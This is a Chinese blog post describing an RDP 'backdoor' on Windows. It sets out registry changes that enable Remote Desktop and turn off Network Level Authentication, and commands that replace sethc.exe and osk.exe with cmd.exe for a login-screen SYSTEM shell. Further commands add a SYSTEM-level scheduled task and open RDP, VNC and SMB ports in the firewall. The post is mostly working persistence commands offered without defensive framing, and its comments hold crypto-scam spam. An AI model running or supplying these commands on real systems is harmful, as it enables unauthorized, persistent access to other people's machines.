默认分类

RDP Gui authentication 后门

发表于 浏览量 1667 评论数 2

设置RDP Gui authentication 超时

只需为LogonTimeout添加一个新的 DWORD 值,其中包含超时值(以秒为单位)。之后,重新启动终端服务。(如果您通过远程桌面连接,您的会话将被终止。)UserAuthentication=dword:0 打开gui authentication
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"LogonTimeout"=dword:0001869f
"UserAuthentication"=dword:00000000

注册表开启远程桌面和配置gui 登录超时时间,配置安全设置开启gui login

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v LogonTimeout /t REG_DWORD /d 99999 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f

重启远程桌面服务

net stop termservice /y
net start termservice

替换sethc.exe或者 osk.exe

takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant administrators:F
del C:\Windows\System32\sethc.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

takeown /f C:\Windows\System32\osk.exe
icacls C:\Windows\System32\osk.exe /grant administrators:F
del C:\Windows\System32\osk.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\osk.exe

登录远程桌面打开cmd后使用schtasks 使用其它用户的权限执行命令,有些命令或者程序需要administrator权限才能运行

schtasks /create /tn "oskk" /tr "cmd /c C:\windows\system32\oskk.bat" /sc onstart /ru system /f
schtasks /run /tn "oskk.bat"

配置防火墙

netsh advfirewall firewall add rule name="Allow RDP" protocol=TCP dir=in localport=3389 action=allow
# 添加允许端口 3389(远程桌面)的防火墙规则
New-NetFirewallRule -DisplayName "Allow RDP" -Direction Inbound -Protocol TCP -LocalPort 3389 -Action Allow

# 添加允许端口 5900(VNC)的防火墙规则
New-NetFirewallRule -DisplayName "Allow VNC" -Direction Inbound -Protocol TCP -LocalPort 5900 -Action Allow

# 添加允许文件共享的防火墙规则
New-NetFirewallRule -DisplayName "Allow File Sharing" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Allow
New-NetFirewallRule -DisplayName "Allow File Sharing - SMB" -Direction Inbound -Protocol TCP -LocalPort 139 -Action Allow

回复

  1. zhhiqrvmav zhhiqrvmav
    Sogo 10

    新项目准备上线,寻找志同道合的合作伙伴

    2025-10-05 03:11 回复
  2. fkkcrfcytv fkkcrfcytv
    Sogo 10

    2025年10月新盘 做第一批吃螃蟹的人coinsrore.com
    新车新盘 嘎嘎稳 嘎嘎靠谱coinsrore.com
    新车首发,新的一年,只带想赚米的人coinsrore.com
    新盘 上车集合 留下 我要发发 立马进裙coinsrore.com
    做了几十年的项目 我总结了最好的一个盘(纯干货)coinsrore.com
    新车上路,只带前10个人coinsrore.com
    新盘首开 新盘首开 征召客户!!!coinsrore.com
    新项目准备上线,寻找志同道合的合作伙伴coinsrore.com
    新车即将上线 真正的项目,期待你的参与coinsrore.com
    新盘新项目,不再等待,现在就是最佳上车机会!coinsrore.com
    新盘新盘 这个月刚上新盘 新车第一个吃螃蟹!coinsrore.com

    2025-10-07 10:31 回复
This is just a placeholder img.